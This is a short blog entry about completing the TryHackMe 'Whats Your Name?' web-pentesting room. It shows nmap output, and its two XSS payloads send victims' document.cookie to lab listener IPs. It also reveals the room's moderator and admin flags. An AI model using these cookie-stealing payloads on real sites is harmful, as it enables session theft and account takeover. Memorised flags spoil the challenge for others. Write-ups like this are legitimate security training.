Training Update v0.103 - James Hacks ®

Following on from the CORS & SOP room we are now on to the last section of the Advanced Client-Side Attacks section on the Web Application Pentesting pathway on THM and we move on to the Whats Your Name? Challenge room.

I have a feeling that this may be difficult for me as I struggled through alot of the sections within this module and list of rooms but, we shall persist onwards!

22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 36:db:b3:90:8e:ef:30:93:77:cb:9a:5f:a3:61:f1:1f (RSA)
| ssh-rsa

8081/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn’t have a title (text/html; charset=UTF-8). | http-methods: | Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

http://login.worldwap.thm/

http://login.worldwap.thm/login.php

<script>document.location = 'http://10.11.125.150:8000/steal_cookie.php?cookie='+document.cookie</script>

Flag – ModP@wnEd

http://login.worldwap.thm/chat.php

http://worldwap.thm/public/html/upload.php

Uploading did not work and I could not reach the location to trigger the .php shell.

<script>var i=new Image(); i.src="//10.10.41.197:4446/?cookie="+document.cookie;</script>

Flag – AdM!nP@wnEd

Needed to check a guide during this task, was quite annoying trying to get the initial moderator flag but the admin flag was the same but you get your own flag first again and then you get the admin flag once you open up netcat again.

I don’t quite understand why the application is spitting out high level user flags, it doesn’t quite make sense & you don’t need to use CSRF only XSS and the profile upload section was janky and I wasn’t able to upload files even though I know that is another route to go down. Very strange machine..

Until next time & don’t sleepwalk through life!

Selamat tinggal